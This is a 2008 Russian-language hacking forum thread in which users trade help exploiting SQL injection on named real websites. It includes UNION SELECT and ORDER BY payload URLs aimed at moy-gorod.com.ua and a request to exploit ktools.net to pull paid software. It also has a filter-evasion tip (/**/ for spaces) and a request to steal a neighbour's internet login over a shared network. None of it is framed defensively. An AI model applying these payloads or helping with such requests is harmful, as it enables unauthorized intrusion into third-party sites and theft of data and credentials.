 |
|
25.09.2008, 15:02
|
|
Banned
Регистрация: 23.02.2008
Сообщений: 268
С нами:
9586096
Репутация:
850
|
|
Сообщение от USAkid
у меня была такая же трабла с запросом. Когда подставляешь ` (обратную кавычку) то результат меняется...
Без разницы какую кавычку ставить ... Важно изменить так чтобы страница имела отрицательное значение.
|
|
|
25.09.2008, 15:36
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
Сообщение от DJ ][akep
Помогите SQL-inj
Вот кол-во столбцов вроде подобрал
PHP код:
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+order+by+21/*
но так нехочет:
PHP код:
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
Скорее всего одна переменная идёт в два разных запроса с разной структурой, т.е. разное количество столбцов
Сообщение от SIdoy
Сообщение от IND1G0
http://сайт/id=0+union+select+1/*
Выводит
(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16
Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?
Попробуй вместо пробелов /**/
id=0/**/union/**/select/**/1/*
Бред. Значение из переменной подставляется в limit, а т.к. в лимит нельзя вставлять выражения, то ты в пролёте.
Сообщение от luz3r
Без разницы какую кавычку ставить ... Важно изменить так чтобы страница имела отрицательное значение.
Надо чтобы значение не существовало
__________________
Последний раз редактировалось +toxa+; 25.09.2008 в 16:24..
|
|
|
|
25.09.2008, 16:33
|
|
Banned
Регистрация: 23.02.2008
Сообщений: 268
С нами:
9586096
Репутация:
850
|
|
Надо чтобы значение не существовало
я ето имел в виду.
|
|
|
|
25.09.2008, 19:59
|
|
Новичок
Регистрация: 18.09.2008
Сообщений: 15
С нами:
9286645
Репутация:
73
|
|
помогите заюзать http://ktools.net/news_detail.php?nid=' нужно вытащить двиги которые продаются
|
|
|
|
25.09.2008, 20:19
|
|
Познающий
Регистрация: 31.05.2008
Сообщений: 58
С нами:
9446056
Репутация:
27
|
|
Как узнать пасс на инет у соседа? у нас с ним сетка!!!
|
|
|
|
25.09.2008, 22:37
|
|
Banned
Регистрация: 10.04.2008
Сообщений: 618
С нами:
9518786
Репутация:
942
|
|
Сообщение от 777demyan777
Как узнать пасс на инет у соседа? у нас с ним сетка!!!
По конкретней сударь!
|
|
|
|
25.09.2008, 23:34
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
Сообщение от +toxa+
Бред. Значение из переменной подставляется в limit,
1значение переменной вообще может не фигурировать в запросе, что общего между:
страница id=0 union select 1/*
и
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16
2 и это не обязательно лимит, например where lala=1,-20,10
:add sql inj здесь не прокатит
|
|
|
|
26.09.2008, 00:16
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Так,активировал телнет серв на компе.При коннекти по 3389-ому порту выдаёт следующее:
Вход в систему невозможен из-за ограничений учётной записи
Каких ограничений ? =_=.Проверку делал,когда чел был в логоффе и в онлайне.Фаир и антивирь отключен,ибо это точно не из-за них.
|
|
|
|
26.09.2008, 00:32
|
|
Познающий
Регистрация: 31.05.2008
Сообщений: 58
С нами:
9446056
Репутация:
27
|
|
У меня с моим соседом стоит сетка через хаб, и у него безлимитка, хочу узнать его логи и пасс на инет
|
|
|
|
26.09.2008, 02:31
|
|
Новичок
Регистрация: 21.09.2008
Сообщений: 9
С нами:
9283286
Репутация:
1
|
|
http://сайт/id=0+union+select+1/*
Выводит
(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16
Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?
Всеи спасибо, разобрался...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
